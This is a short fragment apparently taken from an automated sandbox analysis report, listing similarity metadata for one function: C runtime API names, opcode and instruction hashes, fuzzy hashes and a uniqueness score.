                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_40b000_4AFA.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                                                                  • API String ID: 803148776-1018135373
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 801461631c007e9c63869f2a2c5a3911ace51b206ccbda3a3d75eac155ede972
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5c151b13cc118f49702bbc0ff1d717ccf02c371ff6ed4a2a0973c1e5bb56880d
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 801461631c007e9c63869f2a2c5a3911ace51b206ccbda3a3d75eac155ede972
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92012835C01305DACF389FB6D8806AEB3B5BF14715F14883FE881766D1CB388988CA0A
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%